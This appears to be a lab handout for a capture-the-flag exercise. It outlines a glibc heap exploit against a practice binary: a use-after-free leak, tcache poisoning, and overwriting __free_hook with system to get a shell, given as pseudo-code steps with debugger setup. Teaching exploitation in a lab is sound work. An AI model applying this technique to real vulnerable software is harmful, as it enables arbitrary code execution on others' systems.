Daily Reminder: Mom's Spaghetti

Our compass through all of this is the desire for the following comfort food:

• CONQUER ADDRESS RANDOMIZATION by a USE-AFTER-FREE vulnerability to leak a glibc address
• WRITE-WHAT-WHERE using TCACHE-POISONING for arbitrary writing to glibc
• CONTROL INSTRUCTION POINTER by overwriting the FREE_HOOK in glibc with system where "/bin/sh" is written in the free'd chunk

Today we're just going to get this thing done.

LAB DAY: Leak a glibc, compute FREE_HOOK and system, tcache-poisoning for WWW

(Given a USE-AFTER-FREE)

OK what's the samba?

Something like this:

• A = malloc(24)
• B = malloc(24)
• C = malloc(0x421)
• D = malloc(24)
• edit(D, "/bin/sh")// (we'll want this later)
• free(C) // (UNSORTEDBIN -> C -> main_arena)
• view(C) // (this is glibc leak)
• free(A) // (tcache:0x20 -> A)
• free(B) // (tcache:0x20 -> B -> A)
• edit(B, p64(__FREE_HOOK)) // (tcache:0x20 -> B -> FREE_HOOK)
• E=malloc(24) // (E = B)
• F=malloc(24) // (F = FREE_HOOK)
• edit(F, p64(system)) // (now FREE_HOOK is system)
• free(D) // system("/bin/sh")

Practical Stages:

Stage 1: Binary runs with pwntools AND pwndbg

First run tmux then run ipython3 -i exp.py where exp.py is the following script. Confirm you have a two screen setup to interact AND debug

Stage 2: Make sure you are linked to glibc 2.31

Either use that old pwndocker image (https://prof.ninja/pwndocker last three lines) OR

Use patchelf: patchelf --set-interpreter ./ld-linux-x86-64.so.2 --set-rpath . moms confirm the linking worked with ldd ./moms

Stage 3: Generate and process a leak

Do the first few parts of the samba and VIEW AFTER FREE the big chunk. Save the view response into a variable and do some Python to process the leak something like this: u64(uglybytes.ljust(8,b"\x00"))

Use vmmap to find the base of glibc and subtract it from your leak to get the forever offset, save the offset into your script. Now in all future versions you can do leak - forever_offset to get the glibc base address (even though it's random every time). Confirm this by print(hex(glibcbase)) and look for 000 at the end.

Now find the other two offsets you need: the offset from the base of glibc to the location of system and __free_hook. Use info address __free_hook and info address system and subtract the glibcbase to get your two forever offsets.

Stage 4: Finish the Samba get your flag

In your script the edits aren't separate lines but rather part of your malloc, and you'll need to add "indexes" which are just references for you the hacker to use later. I'll encourage you to visualize the tcache bin after steps to make a really accurate mental model. Once you think your samba is working then you can switch from the gdb line to the old p=process line at the top of your script. Then when you're done do p.interactive() and cat flag.txt.

Heap Reference Guides: